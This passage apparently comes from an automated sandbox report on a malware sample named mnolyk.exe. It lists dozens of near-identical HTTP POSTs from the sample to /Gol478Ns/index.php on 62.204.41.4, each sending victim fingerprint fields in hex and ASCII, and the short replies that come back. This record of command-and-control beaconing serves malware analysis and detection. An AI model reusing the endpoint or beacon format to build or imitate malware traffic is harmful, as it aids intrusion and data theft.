                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:50.096600056 CET793INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          639192.168.2.65036462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:50.279050112 CET794OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:50.342825890 CET794INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          64192.168.2.64978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:06.918802023 CET184OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:06.983558893 CET184INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          640192.168.2.65036562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:50.517630100 CET795OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:50.581003904 CET795INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          641192.168.2.65036662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:50.757392883 CET796OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:50.822324991 CET796INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          642192.168.2.65036762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:51.006859064 CET797OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:51.071639061 CET797INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          643192.168.2.65036862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:51.253026009 CET798OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:51.318506002 CET798INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          644192.168.2.65036962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:51.539851904 CET799OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:51.605659962 CET799INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          645192.168.2.65037062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:51.805979013 CET800OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:51.872330904 CET800INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          646192.168.2.65037162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:52.056353092 CET801OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:52.119611979 CET801INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          647192.168.2.65037262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:52.297867060 CET802OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:52.361998081 CET802INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          648192.168.2.65037362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:52.533128977 CET803OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:52.596380949 CET803INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          649192.168.2.65037462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:52.768198967 CET804OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:52.831486940 CET804INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          65192.168.2.64978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:07.828926086 CET185OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:07.894109964 CET185INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          650192.168.2.65037562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:53.005630016 CET805OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:53.074157000 CET805INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          651192.168.2.65037662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:53.252674103 CET806OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:53.316498995 CET806INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          652192.168.2.65037762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:53.490588903 CET807OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:53.555633068 CET807INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          653192.168.2.65037862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:53.744251966 CET808OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:53.806940079 CET808INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          654192.168.2.65037962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:53.987905025 CET809OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:54.054260015 CET809INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          655192.168.2.65038062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:54.222459078 CET810OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:54.284440041 CET810INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          656192.168.2.65038162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:54.458167076 CET811OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:54.524271011 CET811INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          657192.168.2.65038262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:54.707954884 CET812OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
